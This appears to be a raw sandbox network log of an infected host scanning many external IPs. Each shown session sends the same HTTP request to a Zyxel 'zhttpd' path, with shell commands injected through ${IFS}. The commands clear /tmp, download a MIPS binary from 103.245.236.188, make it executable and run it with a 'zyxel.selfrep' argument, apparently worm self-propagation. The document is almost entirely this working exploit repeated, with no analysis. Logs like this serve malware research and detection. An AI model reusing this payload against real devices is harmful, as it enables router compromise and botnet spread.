                                    Jan 13, 2024 19:02:23.927412033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1822192.168.2.1335364187.86.167.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927442074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1823192.168.2.134158248.101.154.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927485943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1824192.168.2.1342856196.226.239.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927517891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1825192.168.2.134739838.155.75.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927576065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1826192.168.2.133612077.209.147.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927589893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1827192.168.2.1354568101.124.61.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927635908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1828192.168.2.1355766177.183.225.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927644968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1829192.168.2.135995881.166.107.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927695036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1830192.168.2.133376013.37.67.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927732944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1831192.168.2.1340016140.16.49.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927769899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1832192.168.2.135983013.187.60.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927782059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1833192.168.2.1354276171.220.138.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927825928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1834192.168.2.1343128156.57.150.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927881956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1835192.168.2.1349312117.212.232.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927917957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1836192.168.2.1359112221.120.242.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927952051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1837192.168.2.1360634207.222.24.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927963018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1838192.168.2.133329464.196.229.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.927987099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1839192.168.2.1351052111.233.204.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928040981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1840192.168.2.1341896140.65.111.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928067923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1841192.168.2.1336982172.143.161.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928114891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1842192.168.2.1339686145.255.247.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928142071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1843192.168.2.134571472.201.33.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928173065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1844192.168.2.1348836195.207.113.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928191900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1845192.168.2.1340362123.184.50.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928256035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1846192.168.2.135902060.96.27.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928277969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1847192.168.2.134507641.61.99.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928327084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1848192.168.2.1349762141.218.114.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928359032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1849192.168.2.1343878159.159.70.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928405046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1850192.168.2.1355858143.155.12.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928433895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1851192.168.2.1334202207.143.252.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928493977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1852192.168.2.1352414202.4.38.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928515911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1853192.168.2.135347475.134.153.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928546906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1854192.168.2.135253693.215.216.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928584099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1855192.168.2.135864284.67.251.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928636074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1856192.168.2.135567657.144.234.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928663015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1857192.168.2.133833818.58.112.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928714991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1858192.168.2.1347434104.84.234.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928725004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1859192.168.2.1360256156.19.70.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928769112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1860192.168.2.1341488165.133.137.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928803921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1861192.168.2.134409096.97.211.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928839922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1862192.168.2.1341522131.191.239.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928869009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1863192.168.2.1345744121.159.200.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928909063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1864192.168.2.1344694112.191.153.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928941965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1865192.168.2.1340192115.164.127.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.928960085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1866192.168.2.134215479.237.181.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929011106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1867192.168.2.134594872.12.92.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929045916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1868192.168.2.1342206197.218.19.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929064989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1869192.168.2.134603648.67.199.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929097891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1870192.168.2.135700480.211.174.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929125071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1871192.168.2.1335532118.139.71.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929164886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1872192.168.2.13519645.227.191.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929193974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1873192.168.2.1360590132.164.120.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929236889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1874192.168.2.1337030192.175.30.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929267883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1875192.168.2.135137650.44.48.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929295063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1876192.168.2.1338828101.131.181.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929352999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1877192.168.2.1355142201.46.158.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929383993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1878192.168.2.135178684.66.83.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929430962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1879192.168.2.1335806193.120.65.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929450035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1880192.168.2.1353904156.228.227.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929488897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1881192.168.2.1352462216.79.111.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929534912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1882192.168.2.133360679.48.9.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929585934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1883192.168.2.1340610130.1.88.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929613113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1884192.168.2.1350504217.219.35.180443
                                    TimestampBytes transferredDirectionData
